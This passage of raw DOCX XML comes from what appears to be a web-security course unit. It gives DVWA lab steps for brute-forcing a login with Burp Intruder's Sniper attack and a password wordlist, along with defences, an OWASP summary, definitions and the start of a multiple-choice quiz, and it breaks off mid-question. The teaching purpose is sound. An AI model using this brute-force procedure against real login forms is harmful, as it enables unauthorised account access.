            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> cookie attribute is a useful additional browser-level defence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.8 Broken Authentication and DVWA Brute Force with Burp Intruder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA's brute-force module demonstrates weak login protection: using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Intruder's Sniper attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a password wordlist against the login form reveals whether the application has any rate-limiting or account-lockout mechanism. If none exists, an attacker can try thousands of password guesses with no restriction — the core weakness behind credential-stuffing attacks at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture the login request in Burp Proxy and send it to Intruder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mark the password field value as the injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (clear other positions).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose attack type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sniper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and load the payload list (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a short custom wordlist for lab time).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start the attack and review response length/status codes to spot the successful login (it usually differs in length or redirects differently from failed attempts).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚑ Defensive Measures</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Account lockout after a small number of failed attempts, CAPTCHA, rate limiting, multi-factor authentication, and monitoring/alerting on abnormal failed-login volume.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The OWASP Top 10 names the most common, high-impact web risks; your syllabus's A08 (SSRF) differs from the official 2021 numbering, where SSRF is A10 — both are explained above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite intercepts, modifies, repeats and automates requests between browser and server, within a defined target scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection lets an attacker change a query's logic; UNION-based extraction pulls data from other tables; parameterised queries are the real fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected, Stored and DOM-based XSS differ in where the payload lives and who it affects; output encoding and CSP are the core defences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File upload vulnerabilities require content-based validation, not extension checks, plus preventing execution in the upload directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF abuses the browser's automatic cookie attachment; CSRF tokens are the standard defence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Intruder's Sniper attack reveals whether a login form has any brute-force protection — lockout, rate limiting and MFA are the fixes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Important Definitions &amp; Terminology</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2437"/>
        <w:gridCol w:w="7309"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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Insecure Direct Object Reference — accessing another user's data by changing an identifier the server trusts blindly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Parameterised query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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 database query where user input is sent separately from the SQL structure, preventing it from being interpreted as code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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Content Security Policy — an HTTP header restricting which script/content sources a browser will execute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Web shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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 small script uploaded to a server that lets an attacker execute operating-system commands through it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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CSRF token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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 random, per-session value embedded in forms to prove a request genuinely originated from the legitimate site</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Burp Intruder Sniper attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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An automated attack that cycles a wordlist through a single request position, used for brute-force or fuzzing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple-Choice Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker changes ?invoice=1002 to ?invoice=1003 and sees another customer's invoice. This is an example of:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Broken Access Control (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOM-based XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Burp Suite, which tool is used to resend a single captured request repeatedly with small edits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intruder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Repeater</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Decoder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which SQL clause is used to determine the number of columns in a UNION-based injection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> GROUP BY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
